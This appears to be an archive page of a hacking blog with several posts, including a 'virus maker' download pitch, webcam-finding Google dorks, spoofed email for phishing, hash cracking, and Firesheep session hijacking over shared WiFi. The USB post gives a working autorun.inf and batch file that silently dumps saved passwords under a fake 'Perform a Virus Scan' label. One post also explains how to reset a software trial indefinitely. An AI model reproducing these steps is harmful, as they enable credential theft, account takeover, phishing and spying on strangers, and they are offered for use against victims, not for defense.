Search This Blog

Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Friday, May 31, 2013

DEADLINE'S VIRUS MAKER 1.8.5(FREE DOWNLOAD)

DeadLine's Virus Maker 1.8.5 is a virus maker that I made because I do not trust all the other virus makers that are out there on the net. I worked on this for 8+ hours in total.
This application lets you create virusses, and you do not need to be a computer "geek" to do this. All you need, is this tool.

Features:
* Show a messagebox on startup
* Add to windows startup
* Close MSN
* Close Skype
* Close Yahoo
* Disable mouse
* Force shutdown
* Force restart
* Infinite beeping
* Infinite messageboxes
* Disconnect from the internet
* Disable firewall
* Disable CMD
* Disable taskmanager
* Disable regedit
* Random mouse movement
* Random keyboard keys sent
* Disable notepad
* And more !



Saturday, April 7, 2012

Google Hacking-Hack Unprotected Web Cams

Many people who are aware of hacking are using this word very frequently.
Google hacking is not to hack google but to use google efficiently to hack by filtering it's results.
Today i am going to show you how to gain access to LIVE web cams online using google.
There are thousands of unprotected webcams available online, Since many Webcams use known protocols to transmit live video streams over the web, it's often very easy to search for publicly accessible webcams.

Step 1: open google

Step 2: search the following dork in google.
                 

Add caption

Now select a webcam and enjoy.
I have shown an example of axis bank camera here.

Here are some more google dorks.. You can search them and enjoy.


THANX leave comment!!

Sunday, March 25, 2012

Send Fake Email


Hi everyone today im going to post how to send fake email.ok so fake email is a online free email sender
and you can change sender, reciever, forward, subject and title anything you want.
the most reason to send fake email is a that you can use fake email for hacking password by using phishing site. i show you website that you can send fake email below.


This site looks like this.
Here you can give any Name, Email ID, Subject, Text.
Name- This is the option from which the mail is to be send.
Email-ID- Here you can give any Email-ID as per your choice.
To- This is important as here you have to give the recipient's Email address.
Subject- Anything as per your choice.
Text- Anything as want to write and send it to the victim.
And many other option as your per your requirement.




This service is perfect for the following: catch a cheating spouse husband or wife., find out if your friend is are real friend ,give warnings to people, inform the police about illegal activities, inform the tax office about tax cheaters, confess your love to somebody, play an email joke with your friends,  

 it is possible to send e-mails without revealing your e-mail address or
any information about your identity. Therefore you can communicate more freely
and you do not have to worry that it might cause consequences for you.
This service allows you to send e-mails without revealing any personal information.
Protect your privacy, protect your data, protect it for free.





Friday, March 9, 2012

whats is hash hacking?


What Is a Hash?
Ok, firstly alot of you still believe that hashes can be "decrypted", this is a common misconception because hashes are generated by One Way Cryptographic Hash Algorithms these means the algorithm that created them CAN NOT be reversed to determine the plain text password.


These one way functions are used by computers to prevent storing passwords in plain text in memory, instead when a password is entered (for example at a log in screen) a one way hash algorithm is applied to the supplied password and then the hashed output is compared to the hash for that user, stored in memory. If the two hashes match, the passwordsare the same and the user is authenticated, if the two hashes are not the same the passwords do not match and the user is denied access.


Different Types Of Hashes And How To Identify Them 
MD5 - The most common hash you will come across in the wild is an MD5 hash (Message-Digest algorithm)

These hashes are easily identified by the following factors:
  • They are always 32 characters in length (128 Bits)
  • They are always hexadecimal (Only use characters 0-9 and A-F)

Code:
Example - f5d1278e8109edd94e1e4197e04873b9

If the hash breaks one of these rules - IT IS NOT MD5.

SHA1 - 
Still used frequently on the internet and is one of a large family of Secure Hash Algorithms.

These hashes are easily identified by the following factors:
  • They are always 40 Characters in length (160 bits)
  • They are always hexadecimal (Only use characters 0-9 and A-F)

Code:
Exampleab4d8d2a5f480a137067da17100271cd176607a1
If the hash breaks one of these rules - IT IS NOT SHA1.

MySQL < 4.1 -
 These aren't used very often but still come up on  very often because people have no idea what to do with them, they are used in older versions of Mysql.

These hashes are easily identified by the following factors
  • They are always 16 Characters in length (64 bits)
  • They are always hexadecimal (Only use characters 0-9 and A-F)
If the hash breaks one of these rules - IT IS NOT MYSQL < 4.1.

Code:
Example - 606727496645bcba

MYSQL5 
Used in newer versions of MYSQL to store database user passwords.

These hashes are easily identified by the following factors
  • They are always 41 characters in length
  • They are always capitalized
  • They always begin with an asterisk 
If the hash breaks one of these rules IT IS NOT MYSQL5.

Code:
Example*C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75


MD5(Wordpress) - Used in word press driven sites, one of the most commonly confused hashes by everyone

These Hashes are easily identified by the following factors
  • They always start with $P$
  • They are always variable case alpha numeric (0-9 A-Z a-z)
  • The are always 34 characters long

If the hash breaks one of these rules
 - IT IS NOT MD5(Wordpress).

Code:
Example - $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1

MD5(phpBB3) -
 Used in PHPBB forums, another commonly miss identified hash, especially amongst skids.

These Hashes are easily identified by the following factors
  • They always start with $H$
  • They are always variable case alpha numeric (0-9 A-Z a-z)
  • The are always 34 characters long
If the hash breaks one of these rules - IT IS NOT MD5(PhpBB).


Code:
Example$H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0


SALTS 

Ok now there is ALOT of confusion around salts , so im going to try and quickly clean this up - the most commonly salted hash is MD5 because it is cryptographically weak and easy to crack. So a salt gets added to the password before hashing to increase the parity. For example MD5($password.$salt).

Salted MD5 - Used in a large amount of applications to increase hash parity and to increase the time it takes to crack.

These Hashes are easily identified by the following factors

  • They consist of two blocks connected by a colon, the first is the hash the second is the salt.
  • The first part of the salted hash is hexadecimal, the second is variable case alphanumeric.
  • They first part will always be 32 characters long
  • The second part can be any length.
If the hash breaks one of these rules - IT IS NOT A SALTED MD5.

Code:
Example - 49adee90123f8c77d9020bba968c34dd:PS2en
Warning - in some cases the salt can contain symbols (but this is rare)
NOTE - 
You need both the salt AND the hash to decrypt a salted md5.

HOW TO CRACK HASH?
MD5 - MD5 hashes are easily broken in the present day due to the prevalence of online MD5 crackers such as  www.hashchecker.de. However if you cant crack your hash online then you will need to use a tool such as John The Ripper or more advanced hash crackers such as Password Pro or HashCat.

Saturday, March 3, 2012

How To Hack Into Computers Through WiFi

The internet is ever growing and you and I are truly pebbles in a vast ocean of information. They say what you don’t know can’t hurt you. When it comes tothe Internet believe quite the opposite. On the Internet there a millions and millions of computer users logging on and off on a daily basis. Information is transferred from one point to another in a heaartbeat. Amongst those millions upon millions of users, there’s you.

In this tutorial i am going to show you how to to access someone's facebook youtube, and many other accounts which is using the same WiFi as you.

You need:

  1. Mozilla Firefox
  2. Firesheep - A Firefox extension  that demonstrates HTTP session hijacking attacks.
  3. WinPcap - WinPcap is an open source library for packet capture and network analysis for the Win32 platforms. It includes a kernel-level packet filter, a low-level dynamic link library (packet.dll), and a high-level and system-independent library.

Step 1: Install WinPcap then drag the Firesheep add-on, and put it on the Firefox icon. Firefox will open and will ask you to install the add on. Install it and restart Firefox.

Step 2: Open the add-on (You can do it by clicking on View -> Sidebar -> Firesheep), then click on Start Capturing and it'll start capturing, and as soon as somebody logs in any account it'll show up the logs, and then you can access their account.

Simple, but functional and VERY effective method to hack someones facebook, youtube, myspace, etc. account through WiFi.


NOTES: 10 BEST RECOMMENDED USB WIFI ADPTORS CAN BE FOUND 

                                                HERE

Wednesday, February 22, 2012

USE USB TO STEAL SOMEONES PASSWORD



This will show you an easy way to steal passwords of a computer with a USB
step 1: open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
step2: open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
step3: copy the autorun and launch file to your USB
step4: go to THIS SITE
and download the programs named in step 2
step5: extract the files you downloaded to your desktop and copy all the .exe files to your USB
step6: remove and re-insert your USB
step7: click on the option ” perform a virus scan”
(this is an exemple, if you want it to say something else go to the autorun file and change it 
step8: go to “my computer”—> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer (if it didn’t crash during the years
msn passwords will not be shown because almost nobody saves those

Monday, February 20, 2012

HOW TO USE SONY VEGAS PRO FOREVER WITHOUT KYGEN

Hey every one today i'm going to show you how to use sony vegas pro or any software forever that with expire limit without keygen. 


today i'm going to teach you by using SONY VEGAS PRO 9


1. Download trial version here 


2. use it till it gets expire 


3. download & install Revo uninstaller  HERE


4, since you installed you will see like this



You see that sony vegas icon there 


5. click on it and they ask you to that you are really sure to uninstalle it..
so say   yes


6. you will see this page  so click advanced and o next


























7. wait till finish analysis uninstall


8.when you click next you will see like this page so click "SELECT ALL" and click "DELETE" 
because you have to delete all registry key first


and you see this too.
so just delete them all
9. CLICK FINISH.
AND since you finish

go INSTALL That trial version again and you will see. that you will get Another 30 days!!!!!

Saturday, February 18, 2012

Portforwarding TUTORIAL!!!!!





1) Find out your gateway.
2) Goto Start----> Run
3) Type in "cmd"
4) Now type "ipconfig" and click enter
5) And you will get the gateway IP.















6) Now type the gateway IP in your web browser.
7) It will ask for username and password.
8) You can find your username and password from a sticker behind your router. Most of the time the user and pass will be "admin".
9) After successful login to your router you will be able to see options for portfowarding.
10) Forward port "100" to your local IP.

If you need some more help to do this you need to goto this link and select your router and check for a tutorial there.


To check whether port "100" is open. Goto this link and type in port 100 and check the result.